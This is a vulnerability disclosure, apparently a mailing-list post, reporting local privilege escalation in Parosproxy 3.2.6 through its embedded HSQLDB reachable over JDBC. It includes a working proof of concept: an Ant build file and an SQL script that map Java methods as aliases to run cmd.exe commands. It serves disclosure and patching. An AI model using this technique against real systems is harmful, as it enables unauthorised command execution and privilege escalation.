Hello,
first word to say: Parosproxy is a great tool, it has helped
me a lot during pentesting. Unfortunately the JDK until version
1.4.2_08 is vulnerable in a way that allows to use JDBC as an attack path.
Parosproxy uses JDBC to persist some state data.
Concerning the release 3.2.6 of Parosproxy [www.parosproxy.org], there is a
minor problem when running it with JDK 1.4.2 until subrelease 08.
It can be used to trigger command injection in the embedded HSQLDB via the
JDBC (localhost on port 9001) by another (like unprivileged user with
lesser rights than the paros process) user on the machine. This
results in privilege escalation.
Demonstration files (see below) have been provided to
contact (at) parosproxy (dot) org. [email concealed]
A similar problem with HSQLDB has occured a while ago when exploiting
former
version of JBoss [http://www.illegalaccess.org/java/jboss.php], you
will find further details there.
According to parosproxy.org this problem has been solved with Paros
version 3.2.7. Please update your old 3.2.6 or older version, it's good
and it's free !
Sincerely
Marc Schnefeld
=======build.xml==========
<project name="sql" default="exec">
<target name="exec">
<sql
driver="org.hsqldb.jdbcDriver"
url="jdbc:hsqldb:hsql://localhost:9001"
userid="sa"
password=""
print="true">
<fileset dir=".">
<include name="*.sql"/>
</fileset>
<classpath>
<pathelement location="lib.jar"/>
</classpath>
</sql>
</target>
</project>
=======build.xml==========
=======exec.sql==========
CREATE ALIAS COMPDEBUG FOR
"org.apache.xml.utils.synthetic.JavaUtils.setDebug" ;
CALL COMPDEBUG(true);
CREATE ALIAS SETPROP FOR "java.lang.System.setProperty";
CALL SETPROP ('org.apache.xml.utils.synthetic.javac','cmd.exe') ;
CREATE ALIAS COMPILE FOR
"org.apache.xml.utils.synthetic.JavaUtils.JDKcompile" ;
CALL COMPILE('a','/c "cmd.exe /c notepad.exe
c:windowssystem32driversetchosts >" ') ;
CREATE ALIAS GETPROP FOR "java.lang.System.getProperty";
CALL GETPROP('org.apache.xml.utils.synthetic.javac') ;
=======exec.sql==========